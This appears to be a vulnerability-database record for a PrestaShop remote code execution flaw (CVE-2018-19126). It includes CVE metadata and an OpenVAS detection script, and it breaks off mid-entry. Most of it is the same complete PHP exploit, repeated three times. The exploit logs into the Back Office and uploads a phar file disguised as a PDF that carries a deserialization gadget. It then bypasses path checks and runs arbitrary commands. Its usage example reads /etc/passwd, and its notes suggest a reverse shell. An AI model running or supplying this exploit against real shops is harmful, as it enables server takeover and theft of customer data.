Description
PrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to execute arbitrary code via a file upload.
Affected Software
Related
{"id": "CVE-2018-19126", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2018-19126", "description": "PrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to execute arbitrary code via a file upload.", "published": "2018-11-09T11:29:00", "modified": "2018-12-12T18:33:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19126", "reporter": "cve@mitre.org", "references": ["https://github.com/PrestaShop/PrestaShop/pull/11286", "https://github.com/PrestaShop/PrestaShop/pull/11285", "http://build.prestashop.com/news/prestashop-1-7-4-4-1-6-1-23-maintenance-releases/", "https://www.exploit-db.com/exploits/45964/"], "cvelist": ["CVE-2018-19126"], "immutableFields": [], "lastseen": "2022-03-23T15:12:16", "viewCount": 30, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:45964"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F99240EBC893E3EEE65E874A09B8C899"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112427"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150757"]}, {"type": "zdt", "idList": ["1337DAY-ID-31774"]}], "rev": 4}, "score": {"value": 7.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:45964"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F99240EBC893E3EEE65E874A09B8C899"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112427"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150757"]}, {"type": "zdt", "idList": ["1337DAY-ID-31774"]}]}, "exploitation": null, "vulnersScore": 7.9}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-434"], "affectedSoftware": [{"cpeName": "prestashop:prestashop", "version": "1.6.1.23", "operator": "lt", "name": "prestashop"}, {"cpeName": "prestashop:prestashop", "version": "1.7.4.4", "operator": "lt", "name": "prestashop"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:prestashop:prestashop:1.6.1.23:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.0.1", "versionEndExcluding": "1.6.1.23", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:prestashop:prestashop:1.7.4.4:*:*:*:*:*:*:*", "versionStartIncluding": "1.7.0.0", "versionEndExcluding": "1.7.4.4", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/PrestaShop/PrestaShop/pull/11286", "name": "https://github.com/PrestaShop/PrestaShop/pull/11286", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://github.com/PrestaShop/PrestaShop/pull/11285", "name": "https://github.com/PrestaShop/PrestaShop/pull/11285", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"]}, {"url": "http://build.prestashop.com/news/prestashop-1-7-4-4-1-6-1-23-maintenance-releases/", "name": "http://build.prestashop.com/news/prestashop-1-7-4-4-1-6-1-23-maintenance-releases/", "refsource": "MISC", "tags": ["Release Notes", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/45964/", "name": "45964", "refsource": "EXPLOIT-DB", "tags": ["Exploit", "Third Party Advisory"]}]}
{"openvas": [{"lastseen": "2020-07-21T20:55:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19126"], "description": "PrestaShop allows remote attackers to execute arbitrary code via a file upload.", "modified": "2020-06-30T00:00:00", "published": "2018-11-13T00:00:00", "id": "OPENVAS:1361412562310112427", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112427", "type": "openvas", "title": "PrestaShop 1.7.4.x < 1.7.4.4 & 1.6.1.x < 1.6.1.23 RCE Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# PrestaShop 1.7.4.x < 1.7.4.4 & 1.6.1.x < 1.6.1.23 RCE Vulnerability\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112427\");\n script_version(\"2020-06-30T09:37:28+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-30 09:37:28 +0000 (Tue, 30 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-13 14:32:22 +0100 (Tue, 13 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-19126\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"PrestaShop 1.7.4.x < 1.7.4.4 & 1.6.1.x < 1.6.1.23 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_prestashop_detect.nasl\");\n script_mandatory_keys(\"prestashop/detected\");\n\n script_tag(name:\"summary\", value:\"PrestaShop allows remote attackers to execute arbitrary code via a file upload.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The issue exists on the file manager integrated in the text editor component in the Back Office.\n By exploiting a combination of security vunerabilities, an authenticated user in the Back Office could upload a malicious file\n that would then allow him or her to execute arbitrary code on the server.\");\n\n script_tag(name:\"affected\", value:\"PrestaShop 1.7.4.x before 1.7.4.4 and 1.6.1.x before 1.6.1.23.\");\n\n script_tag(name:\"solution\", value:\"Update PrestaShop to version 1.7.4.4 or 1.6.1.23 respectively.\");\n\n script_xref(name:\"URL\", value:\"http://build.prestashop.com/news/prestashop-1-7-4-4-1-6-1-23-maintenance-releases/\");\n script_xref(name:\"URL\", value:\"https://github.com/PrestaShop/PrestaShop/pull/11286\");\n script_xref(name:\"URL\", value:\"https://github.com/PrestaShop/PrestaShop/pull/11285\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:prestashop:prestashop\";\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!version = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nif(version_in_range(version:version, test_version:\"1.7.4.0\", test_version2:\"1.7.4.3\")) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"1.7.4.4\");\n security_message(port:port, data:report);\n exit(0);\n}\n\nif(version_in_range(version:version, test_version:\"1.6.1.0\", test_version2:\"1.6.1.22\")) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"1.6.1.23\");\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPrestaShop 1.6.x1.7.x - Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-11T00:00:00", "title": "PrestaShop 1.6.x1.7.x - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19126", "CVE-2018-19125"], "modified": "2018-12-11T00:00:00", "id": "EXPLOITPACK:F99240EBC893E3EEE65E874A09B8C899", "href": "", "sourceData": "<?php\n/**\n * \n * PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution\n * See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.\n * \n * Chaining multiple vulnerabilities to trigger deserialization via phar.\n *\n * Date:\n * December 1st, 2018\n *\n * Author:\n * farisv\n *\n * Vendor Homepage:\n * https://www.prestashop.com/\n *\n * Vulnerable Package Link:\n * https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip\n *\n * CVE :\n * - CVE-2018-19126\n * - CVE-2018-19125\n * \n * Prerequisite:\n * - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.\n * - Back Office account (logistician, translator, salesman, etc.).\n * \n * Usage:\n * php exploit.php back-office-url email password func param\n * \n * Example:\n * php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123\n * system 'cat /etc/passwd'\n * \n * Note:\n * Note that the upload directory will be renamed and you can't upload the\n * malicious phar file again if the folder name is not reverted. You might want\n * to execute reverse shell to gain persistence RCE or include the command to\n * rename the folder again in your payload (you need to know the path to the\n * upload directory).\n * \n * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.\n * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.\n * \n */\n\nnamespace PrestaShopRCE {\n\n class Exploit {\n private $url;\n private $email;\n private $passwd;\n private $cmd;\n private $func;\n private $param;\n\n public function __construct($url, $email, $passwd, $func, $param) {\n $this->url = $url;\n $this->email = $email;\n $this->passwd = $passwd;\n $this->func = $func;\n $this->param = $param;\n }\n\n private function post($path, $data, $cookie) {\n $curl_handle = curl_init();\n \n $options = array(\n CURLOPT_URL => $this->url . $path,\n CURLOPT_HEADER => true,\n CURLOPT_POST => 1,\n CURLOPT_POSTFIELDS => $data,\n CURLOPT_RETURNTRANSFER => true,\n CURLOPT_COOKIE => $cookie\n );\n \n curl_setopt_array($curl_handle, $options);\n $raw = curl_exec($curl_handle);\n curl_close($curl_handle);\n\n return $raw;\n }\n\n private function fetch_cookie($raw) {\n $header = \"Set-Cookie: \";\n $cookie_header_start = strpos($raw, $header);\n $sliced_part = substr($raw, $cookie_header_start + strlen($header));\n $cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));\n return $cookie;\n }\n\n public function run() {\n\n // Login and get PrestaShop cookie\n $data = array(\n 'email' => $this->email,\n 'passwd' => $this->passwd,\n 'submitLogin' => '1',\n 'controller' => 'AdminLogin',\n 'ajax' => '1'\n );\n $cookie = \"\";\n $raw = $this->post('/', $data, $cookie);\n $prestashop_cookie = $this->fetch_cookie($raw);\n\n // Get FileManager cookie\n $data = array();\n $cookie = $prestashop_cookie;\n $raw = $this->post('/filemanager/dialog.php', $data, $cookie);\n $filemanager_cookie = $this->fetch_cookie($raw);\n\n // Craft deserialization gadget\n $gadget = new \\Monolog\\Handler\\SyslogUdpHandler(\n new \\Monolog\\Handler\\BufferHandler(\n ['current', $this->func],\n [$this->param, 'level' => null]\n )\n );\n\n // Craft malicious phar file\n $phar = new \\Phar('phar.phar');\n $phar->startBuffering();\n $phar->addFromString('test', 'test');\n $phar->setStub('<?php __HALT_COMPILER(); ? >');\n $phar->setMetadata($gadget);\n $phar->stopBuffering();\n\n // Change the extension\n rename('phar.phar', 'phar.pdf');\n\n // Cookie for next requests\n $cookie = \"$prestashop_cookie; $filemanager_cookie\";\n\n // Upload phar.pdf\n $curl_file = new \\CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');\n $data = array(\n 'file' => $curl_file\n );\n $raw = $this->post('/filemanager/upload.php', $data, $cookie);\n\n // Rename image directory to bypass realpath() check\n $data = array(\n 'name' => 'renamed'\n );\n $raw = $this->post(\n '/filemanager/execute.php?action=rename_folder',\n $data,\n $cookie\n );\n\n // Trigger deserialization\n // The '/img/cms/' substring is important to bypass string check\n $data = array(\n 'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'\n );\n $raw = $this->post(\n '/filemanager/ajax_calls.php?action=image_size',\n $data,\n $cookie\n );\n\n // Display the raw result\n print $raw;\n\n }\n }\n\n}\n\n/*\n * Based on\n * https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/\n*/\nnamespace Monolog\\Handler {\n\n class SyslogUdpHandler {\n protected $socket;\n\n function __construct($param) {\n $this->socket = $param;\n }\n }\n\n class BufferHandler {\n protected $handler;\n protected $bufferSize = -1;\n protected $buffer;\n protected $level = null;\n protected $initialized = true;\n protected $bufferLimit = -1;\n protected $processors;\n\n function __construct($methods, $command) {\n $this->processors = $methods;\n $this->buffer = [$command];\n $this->handler = clone $this;\n }\n }\n\n}\n\nnamespace {\n\n if (count($argv) != 6) {\n $hint = \"Usage:\\n php $argv[0] back-office-url email password func param\\n\\n\";\n $hint .= \"Example:\\n php $argv[0] http://127.0.0.1/admin-dev/ \";\n $hint .= \"salesman@shop.com 54l35m4n123 system 'uname -a'\";\n die($hint);\n }\n\n if (!extension_loaded('curl')) {\n die('Need php-curl');\n }\n\n $url = $argv[1];\n $email = $argv[2];\n $passwd = $argv[3];\n $func = $argv[4];\n $param = $argv[5];\n\n $exploit = new PrestaShopRCE\\Exploit($url, $email, $passwd, $func, $param);\n $exploit->run();\n\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-12-12T10:40:36", "description": "", "published": "2018-12-12T00:00:00", "type": "packetstorm", "title": "PrestaShop 1.6.x / 1.7.x Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-19126", "CVE-2018-19125"], "modified": "2018-12-12T00:00:00", "id": "PACKETSTORM:150757", "href": "https://packetstormsecurity.com/files/150757/PrestaShop-1.6.x-1.7.x-Remote-Code-Execution.html", "sourceData": "`<?php \n/** \n* \n* PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution \n* See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation. \n* \n* Chaining multiple vulnerabilities to trigger deserialization via phar. \n* \n* Date: \n* December 1st, 2018 \n* \n* Author: \n* farisv \n* \n* Vendor Homepage: \n* https://www.prestashop.com/ \n* \n* Vulnerable Package Link: \n* https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip \n* \n* CVE : \n* - CVE-2018-19126 \n* - CVE-2018-19125 \n* \n* Prerequisite: \n* - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4. \n* - Back Office account (logistician, translator, salesman, etc.). \n* \n* Usage: \n* php exploit.php back-office-url email password func param \n* \n* Example: \n* php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123 \n* system 'cat /etc/passwd' \n* \n* Note: \n* Note that the upload directory will be renamed and you can't upload the \n* malicious phar file again if the folder name is not reverted. You might want \n* to execute reverse shell to gain persistence RCE or include the command to \n* rename the folder again in your payload (you need to know the path to the \n* upload directory). \n* \n* FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES. \n* THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE. \n* \n*/ \n \nnamespace PrestaShopRCE { \n \nclass Exploit { \nprivate $url; \nprivate $email; \nprivate $passwd; \nprivate $cmd; \nprivate $func; \nprivate $param; \n \npublic function __construct($url, $email, $passwd, $func, $param) { \n$this->url = $url; \n$this->email = $email; \n$this->passwd = $passwd; \n$this->func = $func; \n$this->param = $param; \n} \n \nprivate function post($path, $data, $cookie) { \n$curl_handle = curl_init(); \n \n$options = array( \nCURLOPT_URL => $this->url . $path, \nCURLOPT_HEADER => true, \nCURLOPT_POST => 1, \nCURLOPT_POSTFIELDS => $data, \nCURLOPT_RETURNTRANSFER => true, \nCURLOPT_COOKIE => $cookie \n); \n \ncurl_setopt_array($curl_handle, $options); \n$raw = curl_exec($curl_handle); \ncurl_close($curl_handle); \n \nreturn $raw; \n} \n \nprivate function fetch_cookie($raw) { \n$header = \"Set-Cookie: \"; \n$cookie_header_start = strpos($raw, $header); \n$sliced_part = substr($raw, $cookie_header_start + strlen($header)); \n$cookie = substr($sliced_part, 0, strpos($sliced_part, ';')); \nreturn $cookie; \n} \n \npublic function run() { \n \n// Login and get PrestaShop cookie \n$data = array( \n'email' => $this->email, \n'passwd' => $this->passwd, \n'submitLogin' => '1', \n'controller' => 'AdminLogin', \n'ajax' => '1' \n); \n$cookie = \"\"; \n$raw = $this->post('/', $data, $cookie); \n$prestashop_cookie = $this->fetch_cookie($raw); \n \n// Get FileManager cookie \n$data = array(); \n$cookie = $prestashop_cookie; \n$raw = $this->post('/filemanager/dialog.php', $data, $cookie); \n$filemanager_cookie = $this->fetch_cookie($raw); \n \n// Craft deserialization gadget \n$gadget = new \\Monolog\\Handler\\SyslogUdpHandler( \nnew \\Monolog\\Handler\\BufferHandler( \n['current', $this->func], \n[$this->param, 'level' => null] \n) \n); \n \n// Craft malicious phar file \n$phar = new \\Phar('phar.phar'); \n$phar->startBuffering(); \n$phar->addFromString('test', 'test'); \n$phar->setStub('<?php __HALT_COMPILER(); ? >'); \n$phar->setMetadata($gadget); \n$phar->stopBuffering(); \n \n// Change the extension \nrename('phar.phar', 'phar.pdf'); \n \n// Cookie for next requests \n$cookie = \"$prestashop_cookie; $filemanager_cookie\"; \n \n// Upload phar.pdf \n$curl_file = new \\CurlFile('phar.pdf', 'application/pdf', 'phar.pdf'); \n$data = array( \n'file' => $curl_file \n); \n$raw = $this->post('/filemanager/upload.php', $data, $cookie); \n \n// Rename image directory to bypass realpath() check \n$data = array( \n'name' => 'renamed' \n); \n$raw = $this->post( \n'/filemanager/execute.php?action=rename_folder', \n$data, \n$cookie \n); \n \n// Trigger deserialization \n// The '/img/cms/' substring is important to bypass string check \n$data = array( \n'path' => 'phar://../../img/renamed/phar.pdf/img/cms/' \n); \n$raw = $this->post( \n'/filemanager/ajax_calls.php?action=image_size', \n$data, \n$cookie \n); \n \n// Display the raw result \nprint $raw; \n \n} \n} \n \n} \n \n/* \n* Based on \n* https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/ \n*/ \nnamespace Monolog\\Handler { \n \nclass SyslogUdpHandler { \nprotected $socket; \n \nfunction __construct($param) { \n$this->socket = $param; \n} \n} \n \nclass BufferHandler { \nprotected $handler; \nprotected $bufferSize = -1; \nprotected $buffer; \nprotected $level = null; \nprotected $initialized = true; \nprotected $bufferLimit = -1; \nprotected $processors; \n \nfunction __construct($methods, $command) { \n$this->processors = $methods; \n$this->buffer = [$command]; \n$this->handler = clone $this; \n} \n} \n \n} \n \nnamespace { \n \nif (count($argv) != 6) { \n$hint = \"Usage:\\n php $argv[0] back-office-url email password func param\\n\\n\"; \n$hint .= \"Example:\\n php $argv[0] http://127.0.0.1/admin-dev/ \"; \n$hint .= \"salesman@shop.com 54l35m4n123 system 'uname -a'\"; \ndie($hint); \n} \n \nif (!extension_loaded('curl')) { \ndie('Need php-curl'); \n} \n \n$url = $argv[1]; \n$email = $argv[2]; \n$passwd = $argv[3]; \n$func = $argv[4]; \n$param = $argv[5]; \n \n$exploit = new PrestaShopRCE\\Exploit($url, $email, $passwd, $func, $param); \n$exploit->run(); \n \n} \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150757/prestashop1617-exec.txt"}], "zdt": [{"lastseen": "2018-12-12T07:56:00", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-12-12T00:00:00", "type": "zdt", "title": "PrestaShop 1.6.x/1.7.x - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-19126", "CVE-2018-19125"], "modified": "2018-12-12T00:00:00", "id": "1337DAY-ID-31774", "href": "https://0day.today/exploit/description/31774", "sourceData": "<?php\r\n/**\r\n * \r\n * PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution\r\n * See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.\r\n * \r\n * Chaining multiple vulnerabilities to trigger deserialization via phar.\r\n *\r\n * Date:\r\n * December 1st, 2018\r\n *\r\n * Author:\r\n * farisv\r\n *\r\n * Vendor Homepage:\r\n * https://www.prestashop.com/\r\n *\r\n * Vulnerable Package Link:\r\n * https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip\r\n *\r\n * CVE :\r\n * - CVE-2018-19126\r\n * - CVE-2018-19125\r\n * \r\n * Prerequisite:\r\n * - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.\r\n * - Back Office account (logistician, translator, salesman, etc.).\r\n * \r\n * Usage:\r\n * php exploit.php back-office-url email password func param\r\n * \r\n * Example:\r\n * php exploit.php http://127.0.0.1/admin-dev/ [email\u00a0protected] 54l35m4n123\r\n * system 'cat /etc/passwd'\r\n * \r\n * Note:\r\n * Note that the upload directory will be renamed and you can't upload the\r\n * malicious phar file again if the folder name is not reverted. You might want\r\n * to execute reverse shell to gain persistence RCE or include the command to\r\n * rename the folder again in your payload (you need to know the path to the\r\n * upload directory).\r\n * \r\n * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.\r\n * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.\r\n * \r\n */\r\n\r\nnamespace PrestaShopRCE {\r\n\r\n class Exploit {\r\n private $url;\r\n private $email;\r\n private $passwd;\r\n private $cmd;\r\n private $func;\r\n private $param;\r\n\r\n public function __construct($url, $email, $passwd, $func, $param) {\r\n $this->url = $url;\r\n $this->email = $email;\r\n $this->passwd = $passwd;\r\n $this->func = $func;\r\n $this->param = $param;\r\n }\r\n\r\n private function post($path, $data, $cookie) {\r\n $curl_handle = curl_init();\r\n \r\n $options = array(\r\n CURLOPT_URL => $this->url . $path,\r\n CURLOPT_HEADER => true,\r\n CURLOPT_POST => 1,\r\n CURLOPT_POSTFIELDS => $data,\r\n CURLOPT_RETURNTRANSFER => true,\r\n CURLOPT_COOKIE => $cookie\r\n );\r\n \r\n curl_setopt_array($curl_handle, $options);\r\n $raw = curl_exec($curl_handle);\r\n curl_close($curl_handle);\r\n\r\n return $raw;\r\n }\r\n\r\n private function fetch_cookie($raw) {\r\n $header = \"Set-Cookie: \";\r\n $cookie_header_start = strpos($raw, $header);\r\n $sliced_part = substr($raw, $cookie_header_start + strlen($header));\r\n $cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));\r\n return $cookie;\r\n }\r\n\r\n public function run() {\r\n\r\n // Login and get PrestaShop cookie\r\n $data = array(\r\n 'email' => $this->email,\r\n 'passwd' => $this->passwd,\r\n 'submitLogin' => '1',\r\n 'controller' => 'AdminLogin',\r\n 'ajax' => '1'\r\n );\r\n $cookie = \"\";\r\n $raw = $this->post('/', $data, $cookie);\r\n $prestashop_cookie = $this->fetch_cookie($raw);\r\n\r\n // Get FileManager cookie\r\n $data = array();\r\n $cookie = $prestashop_cookie;\r\n $raw = $this->post('/filemanager/dialog.php', $data, $cookie);\r\n $filemanager_cookie = $this->fetch_cookie($raw);\r\n\r\n // Craft deserialization gadget\r\n $gadget = new \\Monolog\\Handler\\SyslogUdpHandler(\r\n new \\Monolog\\Handler\\BufferHandler(\r\n ['current', $this->func],\r\n [$this->param, 'level' => null]\r\n )\r\n );\r\n\r\n // Craft malicious phar file\r\n $phar = new \\Phar('phar.phar');\r\n $phar->startBuffering();\r\n $phar->addFromString('test', 'test');\r\n $phar->setStub('<?php __HALT_COMPILER(); ? >');\r\n $phar->setMetadata($gadget);\r\n $phar->stopBuffering();\r\n\r\n // Change the extension\r\n rename('phar.phar', 'phar.pdf');\r\n\r\n // Cookie for next requests\r\n $cookie = \"$prestashop_cookie; $filemanager_cookie\";\r\n\r\n // Upload phar.pdf\r\n $curl_file = new \\CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');\r\n $data = array(\r\n 'file' => $curl_file\r\n );\r\n $raw = $this->post('/filemanager/upload.php', $data, $cookie);\r\n\r\n // Rename image directory to bypass realpath() check\r\n $data = array(\r\n 'name' => 'renamed'\r\n );\r\n $raw = $this->post(\r\n '/filemanager/execute.php?action=rename_folder',\r\n $data,\r\n $cookie\r\n );\r\n\r\n // Trigger deserialization\r\n // The '/img/cms/' substring is important to bypass string check\r\n $data = array(\r\n 'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'\r\n );\r\n $raw = $this->post(\r\n '/filemanager/ajax_calls.php?action=image_size',\r\n $data,\r\n $cookie\r\n );\r\n\r\n // Display the raw result\r\n print $raw;\r\n\r\n }\r\n }\r\n\r\n}\r\n\r\n/*\r\n * Based on\r\n * https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/\r\n*/\r\nnamespace Monolog\\Handler {\r\n\r\n class SyslogUdpHandler {\r\n protected $socket;\r\n\r\n function __construct($param) {\r\n $this->socket = $param;\r\n }\r\n }\r\n\r\n class BufferHandler {\r\n protected $handler;\r\n protected $bufferSize = -1;\r\n protected $buffer;\r\n protected $level = null;\r\n protected $initialized = true;\r\n protected $bufferLimit = -1;\r\n protected $processors;\r\n\r\n function __construct($methods, $command) {\r\n $this->processors = $methods;\r\n $this->buffer = [$command];\r\n $this->handler = clone $this;\r\n }\r\n }\r\n\r\n}\r\n\r\nnamespace {\r\n\r\n if (count($argv) != 6) {\r\n $hint = \"Usage:\\n php $argv[0] back-office-url email password func param\\n\\n\";\r\n $hint .= \"Example:\\n php $argv[0] http://127.0.0.1/admin-dev/ \";\r\n $hint .= \"[email\u00a0protected] 54l35m4n123 system 'uname -a'\";\r\n die($hint);\r\n }\r\n\r\n if (!extension_loaded('curl')) {\r\n die('Need php-curl');\r\n }\r\n\r\n $url = $argv[1];\r\n $email = $argv[2];\r\n $passwd = $argv[3];\r\n $func = $argv[4];\r\n $param = $argv[5];\r\n\r\n $exploit = new PrestaShopRCE\\Exploit($url, $email, $passwd, $func, $param);\r\n $exploit->run();\r\n\r\n}\n\n# 0day.today [2018-12-12] #", "sourceHref": "https://0day.today/exploit/31774", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-01-13T05:34:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-11T00:00:00", "type": "exploitdb", "title": "PrestaShop 1.6.x/1.7.x - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 